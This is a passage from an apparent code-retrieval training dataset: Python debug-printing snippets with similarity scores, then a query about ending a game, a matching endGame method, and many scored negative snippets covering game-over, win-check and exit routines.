self.verbosity:\n\t\t\tprint(stylize(\"[*] DEBUG: {}\".format(msg), colored.fg(\"wheat_1\")))", "def debug(self, msg=\"\"):\n if self.verbose:\n print(\"Debug: \" + msg)", "def _debug_print(message):\n\n if _debug == True:\n print(message)", "def debug(self, msg):\n if self._debug:\n print \"%s\" % (msg)", "def debug_print(text):\r\n if settings.debug:\r\n print (text)", "def debug(mode=True):\r\n global DEBUG\r\n DEBUG = bool(mode)", "def is_debug ():\n\n return __debug__ and DEBUG", "def d_print(msg):\n if (DEBUG == 1):\n print(msg)", "def main(config, debug):\n config.debug = debug\n if config.debug:\n click.echo('Debug info...')", "def debug(msg):", "def print_debug(self, msg):\n if self.debug:\n print(\"[DEBUG {0}] {1}\".format(datetime.datetime.now(), msg))", "def debug(message):\n if os.environ.get(\"PYCP_DEBUG\"):\n print message", "def debug(self, msg):\n if self.ansible._debug or self.ansible._verbosity > 2:\n self.ansible.log(f'[DEBUG] {msg}')", "def debug():\n return bool(_environ.get(\"ACCELPY_DEBUG\", False))", "def debugPrint(dbg, msg):\n if(dbg):\n print(msg)", "def debug(self, message):\r\n pass", "def debug(self, msg):\n debug(msg)", "def debug(string):\n if conf.DEBUG:\n outputs.print_debug(string)", "def dprint(msg):\n if defaults.debug:\n print('debug: %s' % msg)", "def print_debug(message: str):\n global debug\n if debug:\n print(\"%s%s%s\" % (KCYN, message, KNRM))", "def print_if_debug(debug, cadena):\n if debug:\n print(time.strftime(\"%H:%M:%S DEBUG => \") + cadena)", "def debug(cls, message):\n if cls.verbose:\n print('[DEBUG] {0}'.format(message))", "def debug(state, message):\n if state:\n print(message)", "def debug(self, module, message):\n if self.log_level <= consts.LOG_LEVEL_DEBUG:\n print(\"DEBUG : %s: %s\" % (module, message))", "def on_screen(self) -> bool:\n\n return (\n self.env_var_helper.set_name(\"PYFUNCEBLE_DEBUG_ON_SCREEN\").exists()\n or self.env_var_helper.set_name(\"DEBUG_PYFUNCEBLE_ON_SCREEN\").exists()\n )", "def debug(module, message):\n if loggingLevel >= loggingLevelDebug:\n ModuLog.log(\"D\", module, message)", "def debug_mode(x):\n if x:\n logger.setLevel(logging.DEBUG)\n ch.setLevel(logging.DEBUG)\n _DEBUG = True\n KEEP_TEMPFILES = True\n logger.info(\n 'Debug mode enabled. You may also want to set '\n 'pybedtools.KEEP_TEMPFILES=True to prevent automatic deletion '\n 'of files upon exit.')\n else:\n logger.setLevel(logging.INFO)\n ch.setLevel(logging.INFO)\n _DEBUG = False\n KEEP_TEMPFILES = False\n logger.info('Debug mode disabled')", "def setDebug():\n\tglobal debug\n\tdebug = True", "def _debug_log(self, msg):\n if not self.debug:\n return\n sys.stderr.write('{}\\n'.format(msg))", "def _debug_log(self, msg):\n if not self.debug:\n return\n sys.stderr.write('{}\\n'.format(msg))", "def _debug():\n return _DEBUG", "def DEBUG(self, _strDebugMessage=\"\"):\n self.edLogging.DEBUG(_strDebugMessage)", "def debug(self, msg):\n\n if (self.logger): self.logger.debug(msg)", "def logDebug(self, msg) :\n if self.debug :\n sys.stderr.write(\"%s\\n\" % msg)\n sys.stderr.flush()", "def debug(state: bool, /) -> None:", "def debug(self):\n return Config.DEBUG", "def debug(self, text):\n\n debug_text = self._get_debug_text(text)\n if self._live_debug_level == logging.DEBUG and self._live_debug_enabled:\n if self.py_cui_root is not None:\n self.py_cui_root.status_bar.set_text(debug_text)\n super().debug(debug_text)\n else:\n super().debug(debug_text)", "def show_debug_msg(self) -> None:\n if self.debug_mode:\n for point in self.points:\n print(point.debug_info())", "def debug(self, msg):\n\n\t\tif( self.logger ): self.logger.debug( msg )", "def main(ctx, debug):\n if debug:\n logger.setLevel(logging.DEBUG)", "def show_debug(self):\n return self.debug and self.n_evaluations == 0", "def __debug(msg):\n\n pass", "def DEBUG(*args, **kwargs):\n if __name__ != \"__main__\":\n print(*args, **kwargs)", "def debug(msg):\n #print(msg)\n pass\n #end debug", "def handle_admindebugon(bot, event):\n event.chan.data.debug = True;\n event.chan.save()\n event.reply(\"debugging is enabled for %s\" % event.channel)", "def debug_print(debug_data):\n if DEBUG_MODE == \"true\":\n pp.pprint(debug_data)", "def is_debugging() -> bool:\n if os.getenv(\"DEBUGGING\") == \"1\":\n return True\n return False", "def debug(debug_string, to_debug):\n if to_debug:\n print(\"DEBUG {0}: {1}\".format(strftime('%H:%M:%S'), debug_string))", "def debug(self, message):\n return self.log(\"DEBUG\", message)", "def debug(self, msg, *args, **kwargs):\n pass", "def debug(message):\n global LAST_LOG\n if 'DEBUG' in os.environ: # pragma: no cover\n LAST_LOG = message\n cprint('\\r[DBG] {0}'.format(message), 'blue', file=sys.stderr)\n else:\n LAST_LOG = message", "def debug(self):\n\t\tif self.handler.bullet_debug_node.isHidden():\n\t\t\tself.handler.bullet_debug_node.show()\n\t\t\tself.handler.drone_manager.set_debug(True)\n\t\telse:\n\t\t\tself.handler.bullet_debug_node.hide()\n\t\t\tself.handler.drone_manager.set_debug(False)", "def setdebug(self):\n self.debug = True\n irclib.DEBUG = True\n print \"Debug mode on\"", "def is_debug(cls):\n return Traceable.debug & cls.DEBUG_ENABLE", "def debug(msg):\n log_msg(DEBUG, msg)", "def debug(self) -> bool:\n return self._data[ATTR_DEBUG]", "def debug_print(message):\n if DEBUG:\n with print_lock:\n print((Colours.HEADER + 'DEBUG: ' + Colours.END_COLOUR + message).strip())", "def debug(self, msg):\n\n self(msg, DEBUG)", "def debug(self, msg):\r\n self.logger.debug(msg)", "def debugging_tests():\n logging.warning(\"Running debugging tests...\")\n pass", "def debug(self, *args):\r\n msg = \" \".join([str(x) for x in args])\r\n if not self.signal_debug(self, (msg)):\r\n logging.debug(msg)", "def debug(self, msg):\n debug_msg = self._debug_color\n debug_msg += \"[SHOULDER_DEBUG] \" + msg\n debug_msg += self._reset_color\n self.logger.debug(debug_msg)", "def debug(self):\n self._debug = True\n self.run()\n self._debug = False", "def output_debug_info(self):", "def test_func(debug: bool) -> None:\n click.echo(debug)", "def debug( cls, msg ):\n cls.log( logging.DEBUG, msg )", "def debug_print(self, *args, **kwargs):\n print(\"APP_DEBUG_PRINT\", args, kwargs)", "def debug(msg):\n return log().debug(msg)", "def get_debug():\n return _DEBUG", "def is_debug_environment():\n return find_loader('cli') is None", "def debug(self):\n return self.settings['debug']", "def debug():\n return int(DEBUG)", "def set_debug_mode(self):\n self.debug_mode = True", "def debug(string):\n if verbose:\n print string\n return", "def message_debug(self, m):\n self.message(m, logging.DEBUG)", "def vv_flag():\n log.setLevel(logging.DEBUG)", "def debug(self, msg):\n\n self.logger.debug(msg)", "def debug_option(args, run):\n run.debug = True", "def debug ( self , message , *args , **kwargs ) :\n return self.logger.debug ( message , *args , **kwargs )", "def debug(message, output_no_verbose=False):\r\n global _quiet, _verbose\r\n if not _quiet and (output_no_verbose or _verbose):\r\n print(\"{0} - {1}\".format(datetime.datetime.now(), message))" ]
[ "0.8137028", "0.80153483", "0.77376115", "0.7687844", "0.76748055", "0.767379", "0.7656623", "0.7569436", "0.7528649", "0.7510831", "0.7510831", "0.74950415", "0.7483869", "0.74653614", "0.74565285", "0.74526405", "0.7379881", "0.736538", "0.734727", "0.73451245", "0.734026", "0.7325392", "0.7305496", "0.7291941", "0.72741944", "0.72255635", "0.71924275", "0.7152718", "0.7141016", "0.7116224", "0.7094752", "0.7087041", "0.7085085", "0.7050721", "0.7030426", "0.7024101", "0.69900244", "0.6957192", "0.69482344", "0.6945148", "0.69331694", "0.69281995", "0.69267744", "0.69254845", "0.6887735", "0.68554395", "0.6781559", "0.6768594", "0.67612785", "0.67612785", "0.6755178", "0.67535794", "0.67514646", "0.67390686", "0.67390144", "0.6736862", "0.67311126", "0.6715729", "0.6708048", "0.66842055", "0.66772014", "0.66769046", "0.6644283", "0.6637527", "0.6610033", "0.66091", "0.6604148", "0.65935373", "0.65924406", "0.6586288", "0.6575063", "0.65616137", "0.65598744", "0.6556244", "0.65439886", "0.6537748", "0.65356076", "0.6534783", "0.6515945", "0.651545", "0.6505275", "0.6505093", "0.6494387", "0.64698416", "0.6468591", "0.6461615", "0.6447749", "0.6434418", "0.6432235", "0.6424802", "0.6402115", "0.6398557", "0.63956213", "0.6386979", "0.6382582", "0.6382512", "0.6376612", "0.63763", "0.63349307", "0.63342273" ]
0.8150175
0
Call this function after determining game should end
def endGame(self, message): print(self.board) print("Game over! " + message) self.gameOver = True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def endGame(self):\n pass", "def quit_game(self):\n self.done = True", "def end_game(self):\n self.game.stop_running()", "def api_end_game(self):\n pass", "def end(self, won, reason):\n pass\n # replace with your end logic", "def endGame(self):\n #self.active = False\n self.inGame = False\n self.hand = []\n self.position = None", "def end_of_game(self, winner):\n pass", "def endgame(winner):", "def end_of_game(self):\n self.log.info('The game has ended')\n #\n end_callout = callout.FinishCallout(\n 'callout',\n 'finish_callout',\n ['exit_button'],\n S['end-game-callout'],\n self.deaths,\n )\n end_callout.show()\n #\n self.objects.append(end_callout)\n #\n while True:\n if end_callout.dismiss_button:\n music.fadeout(2)\n yield 2\n break\n yield 0\n #\n sys.exit(0)", "def game_exit(self):\n self.set_state(GameState.EXITING)\n self.game_stop()\n self.game_log_statistics()", "def stand(self):\n self.endgame()", "def endGame(self):\r\n Game.__instance = None", "def after_turn(self):\n pass", "def end_of_game(self):\n end_game = pyip.inputYesNo(f'\\nDo you want to play again?: ')\n\n if end_game == 'no':\n print('\\n-- GAME OVER --')\n sys.exit()\n elif end_game == 'yes':\n self.game_counter += 1", "def check_game_end(self):\r\n\r\n if np.all(self.remaining == -1): # end of game\r\n self.show_results() # show the final results\r\n sys.exit() # exit the program\r", "async def on_end(self, game_result: Result):", "def end_game(self):\n if self._waiting_for_players:\n [p.client.cancel_interactions() for p in self.all_players]\n self._waiting_for_players = False\n\n super().end_game()\n\n self.states[self.state][\"next\"] = \"STOP\"\n self._run_next_state()", "def endCompetition(self):\n self.robot_exit = True", "def __end_turn(self):\n self._turn_counter += 1\n # päivittää pelaajan\n self._player %=2\n self._player += 1\n if (self._gui):\n self.__status[\"text\"] = self._player_names[self._player-1]\n self.__turn_counter_label[\"text\"]= \"{}. Turns taken\".format\\\n (self._turn_counter)\n self.__turn_counter_label.update()\n\n # This will cause stackoverflow in training.\n if (self._state == PLAY and self.__check_ai_turn()):\n self.__ai_turn()", "def end_game(self):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, date=date.today(), won=self.win,\n tiles_remaining=self.tiles_remaining,\n difficulty=self.difficulty)\n score.put()", "def finish():\n pass", "def end(self):\n winners = mafia.str_player_list(self.game.winners())\n logging.info(\"Game over! Winners: %s\" % winners)\n\n subject = \"%s: The End\" % self.name\n body = \"Game over!\\n\\nCongratulations to %s for a well \" \\\n \"(or poorly; I can't tell) played game!\" % winners\n self.send_message(mafia.events.PUBLIC, subject, body)", "def set_end_game(self):\n # For now, we just need to set a flag indicating we should end\n # the game. When we check whether we should load another story\n # or repeat a repeating script, this flag will be used to skip\n # back to the main session script, to the end of the game.\n self._end_game = True", "def bcp_game_end(self, **kwargs):\n self.player = None\n self.events.post('game_ended', **kwargs)", "def leave_loose_game(self):\n self.update_json_file()\n self.end = True\n self.root.destroy()\n GameOver()", "def check_for_end_game(self):\n if self.grid.snake_died():\n self.scores.append(self.score)\n if self.score >= 1:\n self.averages.append(sum(self.scores) / (len(self.averages) + 1))\n # self.plot_scores()\n self.reset()", "def on_client_exit(self, game) -> None:\n pass", "def end_game(self, end_msg):\n self.word_view.reveal_word()\n self.greeterboard.update_gallows()\n self.greeterboard.greets(end_msg)", "def end_game(self):\n controller = self.controller\n self.end_game_running = True\n\n while self.end_game_running:\n controller.keyboard_end_game_control(self)\n controller.display_end_game()\n\n self.reset_game()\n self.run()", "def EndGame(self):\n check_endgame = not self.player.getPlayer().isGeneralExist()\n\n return check_endgame", "def end(self):\n # Update all the things.\n end_font = pygame.font.SysFont(*END_FONT)\n final_score = self.player.nest.acorn_count\n message = \"Game over! Final score: {0}\".format(final_score)\n text_surf = end_font.render(message, True, FONT_COLOUR)\n text_rect = text_surf.get_rect()\n text_rect.center = (SCREEN.width // 2, SCREEN.height // 2)\n\n # Draw all the things.\n self.screen_surf.fill(BKGD_COLOUR)\n self.screen_surf.blit(text_surf, text_rect)\n\n # Render the screen.\n pygame.display.update()\n\n # The main game loop.\n while self.mode is WorldMode.end:\n self.handle_events()", "def finish(self):\n pass", "def finish(self):\n pass", "def _end_game(self, winner_id=0):\r\n if winner_id == 0:\r\n # print(\"The game was a tie!\")\r\n pass\r\n else:\r\n # print(\"{0} has won the game!\".format(winner_id))\r\n pass\r\n self.winner = winner_id", "def finish():", "def finish():", "def finish():", "def finish():", "def end_meassuring(self):\n self.enabler = 0\n #self.t.join()\n return 1", "def finish(self):", "def finish(self):", "def end_game(self):\n print(str(self.__players[0]._Player__name) + \" score is: \"\n + str(self.__fields[0].score))\n print(str(self.__players[1]._Player__name) + \" score is: \"\n + str(self.__fields[1].score))\n Game.play = False", "def end_pygame(self):\n pygame.quit()", "def end(self):\n ...", "def endGame(self, msg):\n title = \"Game Over\"\n QMessageBox.information(self, title, msg)\n self.reset()", "def endgame_winner(self) :\n raise NotImplementedError", "def event_game_over(self):\n print('Game over!')\n self._cmd_exit()", "def end(self) -> None:\n unicurses.endwin()", "def display_end_game(self):\n game_view = self.get_view.get_game_view\n character = self.model.get_character\n\n if character.alive:\n game_view.game_win()\n else:\n game_view.game_over()\n\n game_view.update_display()", "def _complete(self):\n self._last = self._touch\n if self._game.getWall().getBricks() == []:\n m = 'Congratulations!\\nYou Won\\n\\nClick to play again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)\n self._playAgain()\n elif self._game.getPlayerLives() == 0:\n m = 'Game Over\\nClick to try again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)-10\n self._playAgain()\n self._countdownTime = 0\n self._countdownMessage = GLabel(text='3', font_size=40,x=GAME_WIDTH / 2.0,\n y=GAME_HEIGHT*(2.0/3.0), halign='center',\n valign='middle', linecolor=colormodel.WHITE)\n self._pausedMessage = GLabel(text=m,font_size=f,x=GAME_WIDTH / 2.0,\n y=h, halign='center', valign='middle',\n linecolor=colormodel.WHITE)", "def end_game(self):\n\n # End the game\n if game.game_over is False:\n\n correct = game.endscore()\n self.update()\n self.time = self.timer()\n\n # Loop through every space and reveal atoms and guess results.\n won = 0\n missed = 0\n board = self.ids.board\n for item in board.children:\n # Disable spaces to prevent them from being pressed.\n item.disabled = True\n item.disabled_color = item.color\n if isinstance(item, Space) is True:\n number = int(item.number)\n space = game.spacelist[number]\n # Guessed right\n if space.correct is True:\n item.text = 'O'\n item.color = item.disabled_color = scheme.green\n # Guessed wrong\n elif space.guess is True and space.correct is False:\n item.text = 'X'\n item.color = item.disabled_color = scheme.black\n missed += 1\n # Missed atom\n elif space.atom is True and space.guess is False:\n item.text = 'O'\n item.color = item.disabled_color = scheme.red\n\n for i in range(correct):\n self.ids['tracker' + str(i + 1)].color = scheme.green\n\n # Update end button\n if missed == 0:\n won = 1\n text = 'you found them all!'\n elif missed == 1:\n text = 'you missed an atom!'\n elif missed == 5:\n text = 'you missed \\'em all!'\n else:\n text = 'you missed ' + str(missed) + ' atoms!'\n\n self.ids.end_button.text = text\n\n # Prep and send to end screen\n elif game.game_over is True:\n end_screen = sm.get_screen('end_screen')\n end_screen.ids.end_score.text = str(game.score)\n end_screen.ids.time.text = str(self.time)\n\n sm.current = 'end_screen'", "def end_phase():\n pass", "def test_finish_draw(self):\n game = self.ending(['bbw.wwww'], 8, 1)\n game.man_move(0, 3)\n self.assertTrue(game.finished)", "def _end_episode(self):\n self.turn_cnt = 0\n self.episode_cnt += 1\n self.contexts = None\n self.seed_utterances = None\n self.reset_agents()", "async def endGame(self, ctx):\n print(\"Ending game ...\")\n await self.movePlayer(ctx=ctx, voiceChannel=self.lastVoiceChannel, reason=\"Fin de partie.\")\n await self.deleteCategory(ctx=ctx, reason=\"Fin de partie.\")\n await self.deleteRole(ctx=ctx, reason=\"Fin de partie.\")\n print(\"Game ended\")\n await self.delete()", "def finish(self) -> None:", "def finish(self) -> None:", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def endgame(self):\n #reveals the dealer's first card then the dealer hits until the dealer's hand's value is above 16\n self.dealer_hand[0].face_up()\n if self.dealer_hand[0].value in FACE_CARDS:\n self.dealer_value += 10\n elif self.dealer_hand[0].value == \"A\":\n self.dealer_value += 11\n self.dealer_ace_count += 1\n else:\n self.dealer_value += int(self.dealer_hand[0].value)\n\n if self.dealer_value > 21:\n if self.dealer_ace_count > self.dealer_almost_bust:\n #To prevent a Bust, the Dealer's Ace became a one\n self.dealer_value -= 10\n self.dealer_almost_bust += 1\n else:\n self.player_win()\n #House always wins Ties\n elif self.dealer_value == 21:\n self.player_lose()\n\n while self.dealer_value < 17:\n self.hit(\"dealer\")\n\n if (self.player_value - self.dealer_value) > 0:\n self.player_win()\n else:\n self.player_lose()", "def leave(self):\n self.pleaseQuit=1", "def callback_game_loop(self) -> None:\n self._goal_generate()\n self._update()\n self.reset()\n\n while self._player != self._goal:\n self._update()\n action = self._action_callback(\n self._player.np,\n self._goal.np,\n *self._action_callback_args,\n )\n if action == \"QUIT\":\n break\n self._player_erase()\n self.FUNCMAP[action]()\n self._update()\n\n if self._display:\n time.sleep(0.1)\n try:\n if chr(cv2.waitKey(5)) in self.KEYMAP[\"QUIT\"]:\n break\n except ValueError:\n pass\n\n if self._display:\n print(f\"Steps taken: {self._routes[self._current_route_key]}\")\n\n if self._display:\n cv2.waitKey(0)", "def end_game(self):\n pygame.event.clear()\n self.screen.fill(BLACK)\n self.show_on_screen(\"GAME OVER\", (500, 600), font_size=50)\n self.show_on_screen(\"Press \\\"N\\\" to start a new game\", (500, 650), font_size=30)\n self.show_on_screen(\"Press \\\"ESC\\\" to exit\", (500, 710), font_size=30)\n self.show_on_screen(\"SCORE: \" + str(self.score), (500, 560), font_size=50)\n pygame.display.flip()\n\n # clears previously pressed key\n pygame.event.wait()\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n elif event.key == pygame.K_n:\n self.reset_lander()\n self.play()", "def test_endofgame(self):\n game = self.ending(['bwwwwww.'], 8, 1)\n game.man_move(0, 7)\n self.assertTrue(game.finished)", "def endGame(self):\n\t\thue = 0\n\t\thueInc = 360 / len(self.scores.items())\n\n\t\tfor e in self.scores.items():\n\t\t\tcolor = QColor()\n\t\t\tcolor.setHsv(hue, 255, 240)\n\t\t\thue += hueInc - 1\n\t\t\tself.scores[e[0]] = (e[1][0], color.getRgbF())\n\n\t\t# actually ending the game here...\n\t\tfor player in self.players.values():\n\t\t\t\tplayer[0].endGame()\n\t\tself.gameEnded.emit()", "def endGame(self, msg, win):\n elapsedTime = time.time() - self.startTime\n readableTime = str(int((elapsedTime / 60) / 60))\n readableTime += \":\" + str(int(elapsedTime / 60))\n readableTime += \":\" + str(elapsedTime % 60)[0:6]\n msg +=\"Time: \" + readableTime\n self.revealBombs(win)\n self.flagLabel.configure(text=\"Flags: \"+str(self.numFlags))\n messagebox.showinfo('Game Over', msg)", "def end_turn(self):\r\n self.turn += 1", "def finished(self):\n pass", "def end_game(self):\n self.end_writer.write(f\"You have won with {self.score} points! \" \\\n \"Do you want to play again? (y/n)\", font=(\"Arial\", 16, \"normal\"))\n turtle.Screen().onkey(None, \"Left\")\n turtle.Screen().onkey(None, \"Right\")\n turtle.Screen().onkey(None, \"Up\")\n turtle.Screen().onkey(None, \"Down\")", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, \n date=date.today(), \n won=won,\n attempts_remaining=self.attempts_remaining, \n answer=self.answer\n )\n score.put()", "def finished(self):", "def updateComplete(self):\n self.livesScreen()\n if self.getWave().getLives() == 0:\n self.deathScreen()\n else:\n self.winScreen()", "def breakout_loop(self):\n while self.playing:\n self.handle_events()\n self.update()\n if self.game_over:\n self.current_menu = self.fail_menu\n self.playing = False\n self.reset()\n self.draw()", "def play_game(self):\n # need everyone to pass to move to next phase?\n self.deal_cards()\n self.plant_food()", "def GAMEOVER_LOOP():\n pass", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.player, date=date.today(), won=won,\n bombs=len(self.player_bombs))\n score.put()", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, date=date.today(), won=won,\n guesses=self.attempts_allowed - self.attempts_remaining)\n score.put()", "def end(self) -> None:", "def _finish(self):\n self.stage = {}", "def end_of_game(self):\n try:\n play_again = input(\"Would you like to play again?[y]es/[n]o: \").lower()\n except ValueError:\n print(\"That is is not a valid value please use either y or n.\")\n self.end_of_game()\n if play_again == \"y\":\n # Phrase(self.player_guess, new_game=True, run_extend=True)\n # Character(self.player_guess, self.selected_phrase, life_check=True, new_game=True)\n Game()\n elif play_again == \"n\":\n print(\"\\n\"\"Thank you for playing, see y'all next time.\"\"\\n\")\n sys.exit()\n else:\n print(\"That is is not a valid value please use either y or n.\")\n self.end_of_game()", "def tellIfEnded(self):\n self.congratulate()", "def finished(self):\n\t\telog(\"finished\")", "def on_end(self, ctx):\n pass", "def state_finish_exit(cfg, app, win):", "def end_game():\n pygame.quit()\n exit()", "def main(self):\n _age = info.getInfo(self)\n _flag = game.check_age(self, _age)\n if _flag == False:\n exit()\n game.wants_to_play(0)", "def endBattle(self):\n self.map.removeDead()\n self.cancelAttackMode()\n self.deselectUnit()", "def state_finish_do(cfg, app, win, events):", "def finish_game(self) -> bool:\n if not self.started and self.finished:\n return\n\n self.started = False\n self.finished = True\n\n players_list = self.games_list[self.game_index][\"players\"]\n self.games_list[self.game_index][\"players\"] = \\\n list(dict.fromkeys(players_list))\n\n return", "def at_exit(self):\n self.owner.set_layer(self.owner.GAME_LAYER)\n self.owner.current_layer.run()\n self.owner.current_layer.at_exit()", "def endMyTurn(self):\n try:\n result = self.game.server.endEmpireTurn(self.game.authKey)\n if result == 0:\n if self.game.myEmpire['roundComplete'] == 1:\n self.modeMsgBox('You have now un-ended your turn')\n self.game.myEmpire['roundComplete'] = 0\n else:\n self.modeMsgBox('Your turn has been ended, thankyou')\n self.game.myEmpire['roundComplete'] = 1\n self.mainmenu.writeTextRoundEnds()\n elif type(result) == types.StringType:\n self.modeMsgBox(result)\n else:\n \"\"\"End Turn and wait for it to end\"\"\"\n result = self.game.server.endRound(self.game.authKey)\n self.game.server.logout(self.game.authKey)\n from anw.modes.modelogin import ModeLogin\n newMode = ModeLogin(self.game, 200)\n self.game.enterMode(newMode)\n except:\n self.modeMsgBox('endMyTurn->Connection to Server Lost')", "def handleEnd(winner):\n if winner != 0:\n if winner == 1: print(\"human win\")\n if winner == 2: print(\"cpu win\")\n if winner == 3: print(\"draw game\")\n return True\n return False", "def end(self, win):\n if win:\n print('\\033[92m', \"task won.\", '\\033[0m')\n if self._win_sound is not None:\n self.sound_player.play(self._win_sound)\n else:\n print('\\033[91m', \"task lost\", '\\033[0m')\n if self._loose_sound is not None:\n self.sound_player.play(self._loose_sound)\n if self._fulfill_if_lost:\n self.force_fulfill()\n\n # removing the loose task\n if self._loose_task is not None:\n self.gameEngine.taskMgr.remove(self._loose_task)\n if self._to_do_task is not None:\n self.gameEngine.taskMgr.remove(self._to_do_task)\n\n # starting the next step\n self.gameEngine.scenario.start_next_step()", "def exit_game(self):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n 'door_closed.jpg'\n self.ids['button' + str(i)].disabled = False\n setattr(self, 'door'+str(i)+'_counter', 0)\n self.manager.current = 'MainMenu'\n self.ids['score'].text = 'SCORE: 0'\n self.score = 0", "def Finish(self):\n pass", "def on_exit(self, next_scene):", "def end_game(self, game_state: str):\n if game_state == \"win\":\n end_message = \"{0} wins! Would you like to play again?\".format(self.players[self.game.whose_turn])\n else:\n end_message = \"Cat's game! Would you like to play again?\"\n play_again = messagebox.askyesno(title='Game over', message=end_message)\n if play_again:\n self.game.reset_game_data()\n self.reset_game_ui()\n else:\n self.window.destroy()", "def end(self, is_won):\n if is_won:\n self.blit_background()\n self.screen.blit(self.won, (0, 0))\n self.render_screen()\n self.render_font()\n else:\n self.blit_background()\n self.screen.blit(self.lost, (0, 0))\n self.render_screen()\n self.render_font()", "def end_game(self, winner):\n reward = self.reward(winner)\n if self.learning:\n self.q_values[self.represent_state(self.prev_state), self.prev_action] += self.alpha * (\n reward - self.prev_q_val)\n self.log(\"the winner is {0}\".format(winner))\n self.prev_state = None\n self.prev_action = None\n self.prev_q_val = 0\n self.winner = VALUES.NOT_FINISHED" ]
[ "0.87138814", "0.78778964", "0.7744418", "0.774094", "0.7740156", "0.7713625", "0.76796615", "0.76591814", "0.7582613", "0.75363356", "0.7433579", "0.74228734", "0.7402117", "0.73863685", "0.7358601", "0.7350067", "0.73360884", "0.7276998", "0.72497123", "0.7248907", "0.71962297", "0.7189612", "0.71824443", "0.7172564", "0.71655774", "0.7124993", "0.7110651", "0.7105993", "0.70961285", "0.7086156", "0.7083036", "0.7079677", "0.7079677", "0.7053935", "0.70495665", "0.70495665", "0.70495665", "0.70495665", "0.7042575", "0.6998348", "0.6998348", "0.69980645", "0.69964635", "0.69849586", "0.6983939", "0.69586205", "0.69375795", "0.6930484", "0.69294095", "0.69066143", "0.6903816", "0.6898266", "0.68923694", "0.6892198", "0.6873615", "0.6869365", "0.6869365", "0.68565226", "0.68565226", "0.68565226", "0.6844696", "0.68311375", "0.68294525", "0.6828143", "0.68050396", "0.68000686", "0.67945796", "0.67909414", "0.67814", "0.67805976", "0.6775497", "0.67670757", "0.6764385", "0.6762848", "0.67626405", "0.67450976", "0.67434806", "0.67252606", "0.67198116", "0.67057", "0.66945755", "0.6694542", "0.6690067", "0.6687592", "0.6685139", "0.6683771", "0.668343", "0.66695684", "0.66668165", "0.6653898", "0.66518617", "0.66510445", "0.66505575", "0.6647054", "0.66400325", "0.6637646", "0.6634894", "0.66346407", "0.66236", "0.66189635" ]
0.69771904
45
Win by reaching the other side
def checkReachWin(self, color, row): if color[0] == 'W' and row == 0: self.endGame("White reached the end. White wins!\n") elif color[0] == 'B' and row == self.board.size - 1: self.endGame("Black reached the end. Black wins!\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def does_move_win(self, x, y):\n me = self.board[x][y]\n for (dx, dy) in [(0, +1), (+1, +1), (+1, 0), (+1, -1)]:\n p = 1\n while self.is_on_board(x+p*dx, y+p*dy) and self.board[x+p*dx][y+p*dy] == me:\n p += 1\n n = 1\n while self.is_on_board(x-n*dx, y-n*dy) and self.board[x-n*dx][y-n*dy] == me:\n n += 1\n\n if p + n >= (self.connect + 1): # want (p-1) + (n-1) + 1 >= 4, or more simply p + n >- 5\n return True\n\n return False", "def interaction_door(self) -> None:\n self.grid.win = True", "def win_game(self):\n\n def horizontal_win():\n \"\"\"Return whether there is horizontal win\"\"\"\n\n for i in range(0, board_size):\n if set(self.board[i]) == set([o_symbol]) or set(self.board[i]) == set([x_symbol]):\n print \"horizontal win\"\n return True\n\n def vertical_win():\n \"\"\"Return whether there is vertical win\"\"\"\n\n vert_set = set()\n for i in range(0, board_size):\n for j in range(0, board_size):\n vert_set.add(self.board[j][i])\n if vert_set == set([o_symbol]) or vert_set == set([x_symbol]):\n print \"vertical win\"\n return True \n vert_set = set()\n\n def diagonal_win():\n \"\"\"Return whether there is diagonal win\"\"\"\n\n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][i]) \n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 1\"\n return True\n \n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][board_size - 1 - i])\n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 2\"\n return True\n\n if horizontal_win() or vertical_win() or diagonal_win():\n print \"You have won.\"\n return True", "def playerForfeit(self):\n self.handleWin(self.currentplayer*-1)", "def win(self, player):\n if player == 1:\n a = self.player_one.moves\n else:\n a = self.player_two.moves\n winning_moves = []\n for i in range(1, 9, 3):\n winning_moves.append(range(i, i + 3))\n for i in range(1, 4):\n winning_moves.append(range(i, i + 7, 3))\n winning_moves.append([1, 5, 9])\n winning_moves.append([3, 5, 7])\n for move in winning_moves:\n flg = True\n for index in move:\n if index not in a:\n flg = False\n break\n if flg:\n return True, player\n if len(self.player_one.moves) + len(self.player_two.moves) == 9:\n self.print_space()\n self.display_board()\n self.print_space()\n print \" Games is drawn\"\n self.logging.debug(\"Game is draw, nobody won\")\n self.logging.debug(\"Enjoy the game again :)\")\n sys.exit(100)\n return False, player", "def block_to_win():\n position = row_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n position = column_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n position = diagonal_wise_checking(player)\n if position != -1:\n board[position] = computer\n else:\n return -1", "def checkForWin(self):\n w = self.getWinner()\n if w == PLAYER or w == AI:\n # self.printBoard()\n # print('%d'%w + ' won!')\n return\n if w == Tie:\n # print('Tie')\n return", "def is_win_for(self, checker):\n assert(checker == 'X' or checker == 'O')\n if self.is_vertical_win(checker) or\\\n self.is_down_diagonal_win(checker) or\\\n self.is_up_diagonal_win(checker) or\\\n self.is_horizontal_win(checker):\n return True\n return False", "def check_win_condition(board) -> bool:\n if _check_vertical_win_condition(board) or _check_horizontal_win_condition(board) or 